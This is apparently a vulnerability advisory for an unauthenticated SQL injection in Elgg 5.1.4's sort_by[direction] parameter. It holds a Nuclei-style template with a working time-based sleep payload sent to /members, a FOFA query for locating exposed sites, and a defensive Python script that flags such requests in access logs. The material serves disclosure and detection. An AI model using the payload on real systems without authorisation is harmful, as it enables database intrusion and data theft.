elgg-sqli: Elgg 5.1.4 - SQL Injection

Date: 2025-08-01 | Affected software: Elgg 5.1.4 | POC: public

Vulnerability description

Elgg 5.1.4 has a SQL injection vulnerability in the sort_by[direction] parameter. Because the parameter reaches the query without being restricted to a sort direction, an unauthenticated attacker can manipulate the SQL statement, potentially leading to unauthorized data access or database compromise. No user authentication is required to exploit this vulnerability.

PoC code [public]

id: elgg-sqli

info:
  name: Elgg 5.1.4 - SQL Injection
  author: s4e-io
  severity: high
  description: |
    Elgg 5.1.4 version has a SQL Injection vulnerability in the sort_by[direction] parameter. This vulnerability allows an unauthenticated attacker to manipulate SQL queries by injecting malicious SQL code, potentially leading to unauthorized data access or database compromise. No user authentication is required to exploit this vulnerability.
  reference:
    - https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md
    - https://github.com/Elgg/Elgg
  metadata:
    verified: true
    max-request: 1
    vendor: elgg
    product: elgg
    fofa-query: icon_hash="413602919"
  tags: elgg,sqli,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"elgg.js")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        @timeout 20s
        GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'contains(body,"All members")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100aa3a622eeda786ee700eb329e21cd7343b64c0a304d5f14f03b894dbf53db4200220524751719c1f78f05e04dd7585d938ac76f3a175f36e3dd29a82fca43fa49deb:922c64590222798bb761d5b6d8e72950
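
The template above confirms the flaw with a time-based request. The following is an added detection example, not code from this page or from the Elgg project: it scans constructed access-log lines in combined format, URL-decodes the query string, and flags any /members request whose sort_by[direction] value is not a plain asc/desc, which is also the allow-list check a server-side fix would apply before building ORDER BY. The log lines, IP addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); the second one
# carries the same encoded payload the template above sends.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2025:10:00:01 +0000] "GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bdirection%5D=desc HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Aug/2025:10:00:07 +0000] "GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1" 200 5120 "-" "curl/8.0"
10.0.0.7 - - [01/Aug/2025:10:00:08 +0000] "GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bdirection%5D=ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Aug/2025:10:00:09 +0000] "GET /activity HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Minimal parser for the request line of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The only values a sort direction may legitimately take.
ALLOWED_DIRECTIONS = {"asc", "desc"}


def is_valid_direction(value: str) -> bool:
    """Allow-list check: true only for asc/desc (case-insensitive)."""
    return value.strip().lower() in ALLOWED_DIRECTIONS


def find_suspicious_requests(log_text: str) -> list:
    """Return one record per request whose sort_by[direction] is off-list."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qs percent-decodes keys and values, so sort_by%5Bdirection%5D
        # becomes sort_by[direction] and %2c becomes a comma.
        params = parse_qs(parts.query, keep_blank_values=True)
        for raw in params.get("sort_by[direction]", []):
            if not is_valid_direction(raw):
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "path": parts.path, "direction": raw})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['path']} direction={hit['direction']!r}")
```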
